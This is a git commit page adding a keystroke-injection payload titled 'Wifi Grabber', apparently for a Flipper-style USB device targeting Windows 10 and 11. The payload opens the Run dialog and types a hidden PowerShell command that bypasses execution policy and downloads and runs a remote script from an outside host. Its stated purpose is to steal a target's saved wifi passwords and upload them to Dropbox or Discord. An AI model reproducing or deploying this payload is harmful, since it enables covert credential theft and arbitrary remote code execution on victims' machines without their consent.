Create WifiGrabber.txt
This commit is contained in:
parent
c2740c761d
commit
dff14e6980
1 changed files with 12 additions and 0 deletions
12
Payloads/Flip-WifiGrabber/WifiGrabber.txt
Normal file
12
Payloads/Flip-WifiGrabber/WifiGrabber.txt
Normal file
|
@ -0,0 +1,12 @@
|
||||||
|
REM Title: Wifi Grabber
|
||||||
|
|
||||||
|
REM Author: I am Jakoby
|
||||||
|
|
||||||
|
REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both
|
||||||
|
|
||||||
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/e8v | iex
|
||||||
|
ENTER
|
Loading…
Reference in a new issue